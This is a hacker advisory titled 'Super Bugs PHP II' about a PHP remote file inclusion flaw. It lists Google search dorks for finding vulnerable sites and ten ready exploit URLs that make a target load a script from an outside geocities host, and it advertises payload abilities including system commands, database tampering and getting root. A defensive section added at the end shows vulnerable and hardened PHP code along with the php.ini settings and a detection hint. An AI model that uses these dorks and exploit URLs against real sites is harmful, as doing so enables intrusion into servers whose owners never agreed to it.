Title     : SUPER KIDDIES HACKING "Super Bugs PHP II"
Author    : K-159
Greetz    : KuNTuA, Lieur-Euy, pe_es.
Reference : google.com, membres.lycos.fr, security-corporations.com, security-challenge.com
==========================================================================================

Proof of Concept :
==================
A URL-handling flaw in the fopen() function lets an attacker inject a script into the target server.

Target :
========
Find targets on Google with the following keywords:

1.  allinurl:*.php?page=*
2.  allinurl:*.php?content=*
3.  allinurl:*.php?file=*
4.  allinurl:*.php?filename=*
5.  allinurl:*.php?link=*
6.  allinurl:*.php?view=*
7.  allinurl:*.php?sec=*
8.  allinurl:*.php?document=*
9.  allinurl:*.php?p=*
10. allinurl:*.php?x=*

Exploit :
==========================================================================================
1.  http://www.target.com/target.php?page=http://www.geocities.com/inul_asoy/page.txt
2.  http://www.target.com/target.php?content=http://www.geocities.com/inul_asoy/content.txt
3.  http://www.target.com/target.php?file=http://www.geocities.com/inul_asoy/file.txt
4.  http://www.target.com/target.php?filename=http://www.geocities.com/inul_asoy/filename.txt
5.  http://www.target.com/target.php?link=http://www.geocities.com/inul_asoy/link.txt
6.  http://www.target.com/target.php?view=http://www.geocities.com/inul_asoy/view.txt
7.  http://www.target.com/target.php?sec=http://www.geocities.com/inul_asoy/sec.txt
8.  http://www.target.com/target.php?document=http://www.geocities.com/inul_asoy/document.txt
9.  http://www.target.com/target.php?p=http://www.geocities.com/inul_asoy/p.txt
10. http://www.target.com/target.php?x=http://www.geocities.com/inul_asoy/x.txt

Exploit Details :
==========================================================================================
Upload a file                      : upload a file to the target server
Explore with fopen() function      : find targets that use fopen() on the target server
Execute arbitrary PHP functions    : create a PHP script on the target server
Execute a system() command         : run Unix/Linux commands on the target server
Manager for SQL Server             : change the database settings of the target's SQL server
System overviewer (get the root !) : inspect the target server's system and perform a local root
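The weakness the advisory relies on is a page parameter passed straight to a file function that honours URL wrappers (include() behaves like fopen() here when allow_url_fopen / allow_url_include are on). The following is an added example, not code from the advisory or from any affected product: the vulnerable pattern beside a hardened version that maps the parameter to a fixed allow-list and never builds a path from user input. The pages/ directory, the page names and the php.ini settings shown are assumptions for the example.

```php
<?php
// Added example (not from the original advisory). Assumed layout:
// this file sits next to a pages/ directory holding home.php, about.php, contact.php.

// VULNERABLE: ?page= is used as-is. With allow_url_fopen/allow_url_include
// enabled, a value such as http://host/page.txt is fetched and executed.
function render_page_vulnerable(string $page): void
{
    include $page;   // never do this
}

// HARDENED: the request value is only ever a key into a fixed allow-list,
// so a URL, an absolute path or "../" can never reach the filesystem layer.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(?string $requested): string
{
    // Unknown or missing values fall back to a safe default instead of an error page
    // that might echo the attacker-supplied value back.
    return (is_string($requested) && array_key_exists($requested, PAGES))
        ? PAGES[$requested]
        : PAGES['home'];
}

// Defence in depth: even with the allow-list, confirm the resolved file is a
// regular file strictly below the pages/ directory before including it.
function safe_include(string $file): bool
{
    $base = realpath(__DIR__ . '/pages');
    $real = realpath(__DIR__ . '/pages/' . $file);
    if ($base === false || $real === false || !is_file($real)) {
        return false;
    }
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return false;   // resolved outside the base directory
    }
    include $real;
    return true;
}

// Entry point. In php.ini, additionally set (assumed hardening, not from the advisory):
//   allow_url_include = Off
//   allow_url_fopen   = Off   ; unless remote reads are genuinely needed
if (!safe_include(resolve_page($_GET['page'] ?? null))) {
    http_response_code(404);
}
```

On the detection side, requests whose page/file/content parameters carry a value beginning with a URL scheme are the signal to alert on in web server logs.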